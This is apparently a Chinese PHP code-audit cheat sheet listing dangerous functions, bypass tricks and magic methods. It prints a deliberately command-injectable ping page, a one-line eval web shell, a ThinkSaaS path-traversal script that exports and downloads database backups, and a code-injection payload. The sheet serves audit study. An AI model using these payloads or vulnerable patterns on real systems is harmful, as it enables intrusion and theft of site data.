PHP代码审计
代码审计辅助工具
https://github.com/WhaleShark-Team/cobra
https://github.com/LoRexxar/Kunlun-M
变量覆盖
extract()
import_request_variables()
parse_str()
mb_parse_str()
register_global
遍历初始化变量
file_get_contents函数绕过
(1)使用php://input伪协议绕过 (2)用data://伪协议绕过
RCE
RCE函数
eval、preg_replace + /e模式、assertJavascript:evalVbscript: Execute、EvalPython:exec
<?php include($_SERVER['DOCUMENT_ROOT'].'/btslab/header.php'); ?> <br/><b>Ping:</b>Please Enter Domain Name or IP Address: <br/><br/> <form action="cmd.php" method="get"> <input type="text" name="host" value=""/> <br/><br/><input type="submit" name="Go" value="Go"/> </form> <br/> <?php if(isset($_GET['host'])) { if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { $result=shell_exec("ping ".$_GET['host']); } else { $result=shell_exec("ping -c 4 ".$_GET['host']); } echo "<b>Result:</b></br><pre>".$result."</pre>"; } ?> <?php include($_SERVER['DOCUMENT_ROOT'].'/btslab/footer.php'); ?>
<?php eval($_REQUEST['code']); ?>
LFI -》 备份文件下载
<?php //插件条件入口 defined('IN_TS') or die('Access Denied.'); if(is_file('plugins/'.$app.'/'.$plugin.'/'.$in.'.php')){ require_once('plugins/'.$app.'/'.$plugin.'/'.$in.'.php'); }else{ tsNotice('sorry:no plugin!'); } defined('IN_TS') or die('Access Denied.'); switch($ts){ case "": //输出备份文件 $arrSqlFile = tsScanDir('data/baksql','file'); include template('sql'); break; //优化 case "optimize": $arrTables = $db->fetch_all_assoc("SHOW TABLES"); foreach($arrTables as $key=>$item){ $db->query("OPTIMIZE TABLE `".$item."` "); } qiMsg('优化数据库成功!'); break; //备份导出 case "export": require_once 'thinksaas/DbManage.php'; $bakdb = new DBManage ( $TS_DB['host'].':'.$TS_DB['port'], $TS_DB['user'], $TS_DB['pwd'], $TS_DB['name'], 'utf8' ); $bakdb->backup ('','data/baksql/'); qiMsg('数据库备份完毕!'); break; ?php date_default_timezone_set('Asia/Hong_Kong'); $url = "http://192.168.116.129/thinksaas/index.php?app=user&ac=plugin&plugin=face&in=my5t3ry/../../../../app/system/action/sql&ts=export"; file_get_contents($url); $time = date('YmdHis'); for($i = $time; $i <= $time + 300; $i++){ $filename = $i ."_all_v1.sql"; $url = "http://192.168.116.129/thinksaas/data/baksql/".$filename; if (@file_get_contents($url, null, null, -1, 1)){ echo $url; } } ?>
php绕过MD5 - 科学计数法绕过
php绕过MD5 - 数组全等绕过
反序列化
__construct()
__destruct()
__call()
__callStatic()
__get()
__set()
__isset()
__unset()
__sleep()
__wakeup()
__toString()
__invoke()
__set_state()
__clone()
__debugInfo()
unserialize()
文件写入
file_put_contents()
Payload:
');phpinfo();exit();// (');部分根据情况调整)
SQLI
update()
XSS
开源项目
https://github.com/bowu678/php_bugs